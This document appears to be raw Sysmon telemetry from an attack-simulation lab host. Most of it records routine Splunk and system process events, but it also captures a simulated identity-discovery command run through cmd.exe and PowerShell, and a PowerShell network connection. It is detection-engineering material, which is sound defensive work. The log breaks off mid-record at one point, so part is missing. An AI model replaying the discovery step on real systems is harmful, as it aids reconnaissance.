13:21:33.005{B81B27B7-6638-6125-B000-01000000C801}12085068C:\Windows\system32\cmd.exe{B81B27B7-A1DD-6140-A756-04000000C801}5600C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
154100x800000000000000036498327Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-A1DD-6140-A756-04000000C801}5600C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Execmd.exe /c powershell.exe [System.Security.Principal.WindowsIdentity]::GetCurrent()C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{B81B27B7-6638-6125-B000-01000000C801}1208C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 23542300x800000000000000036498358Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:34.841{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB8F15A604CD52200B2A82BDC741F69A,SHA256=1EDCA3C1D88A818BF63E4AB5E4BBE9D20CB03947655F31C9933782634AB31A6C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498357Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:34.089{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0AF606ED09844BEF635FCC05EF6D5AA8,SHA256=C8659DDAB4AD16FCFDB16615A7F1AB3C0F2F5C093A6034FD8ED6B4B6E0D46EFC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498356Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:34.024{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A85439F54F27DC0107460570C92A8448,SHA256=B660E0D78B78A6F5583164246BA3904142F9EDE43F54499A89099F79DF27AAC4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498355Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:34.023{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E8DA91D6C86124874F723211835DD855,SHA256=CF1BA510F84C136DA1AD0E27E8A9657E99CDFF9F2344227D44E0EE381AB15E56,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498359Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:35.856{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDF8CFF9B3C3A69754A93520F49433B3,SHA256=B4AC069D3CD1E5FCBB3F1C76483E62EE849A687D77EF1DC77F90A1C368DD68FA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498361Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:36.871{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B074C88D53CE3FD4532DB44CEB9215AB,SHA256=5A8DDDE6537D6AC75E0220CA60B67144740451B0E040808DD9F48330077ACA9B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498360Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:36.371{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=08A3A821B500653DF39110245BF94589,SHA256=8221E188F924D78BBD354CCC40162E885F62EB0CFB60316654D83EB621C9F95C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498373Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:07.759{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50640-false10.0.1.12-8000- 354300x800000000000000036498372Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:06.976{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50639-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000036498371Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:37.954{B81B27B7-A1E1-6140-A956-04000000C801}67002464C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498370Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:37.888{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EF705C2440D9EAF2528F2EA3523442C,SHA256=D48111E967958966DC0281720BB51DF89AF55B6F746B6247DF9E4CAE3A453644,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498369Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:37.801{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A1E1-6140-A956-04000000C801}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498368Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:37.801{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498367Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:37.801{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498366Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:37.801{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498365Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:37.801{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498364Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:37.801{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A1E1-6140-A956-04000000C801}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498363Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:37.801{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A1E1-6140-A956-04000000C801}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498362Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:37.786{B81B27B7-A1E1-6140-A956-04000000C801}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program 
13:21:59.365{B81B27B7-4012-611D-0D00-00000000C801}7925132C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498480Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498479Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498478Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498477Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498476Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498475Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498474Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498473Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498472Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498471Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498470Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498469Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498468Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498467Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:22:00.595{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498466Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 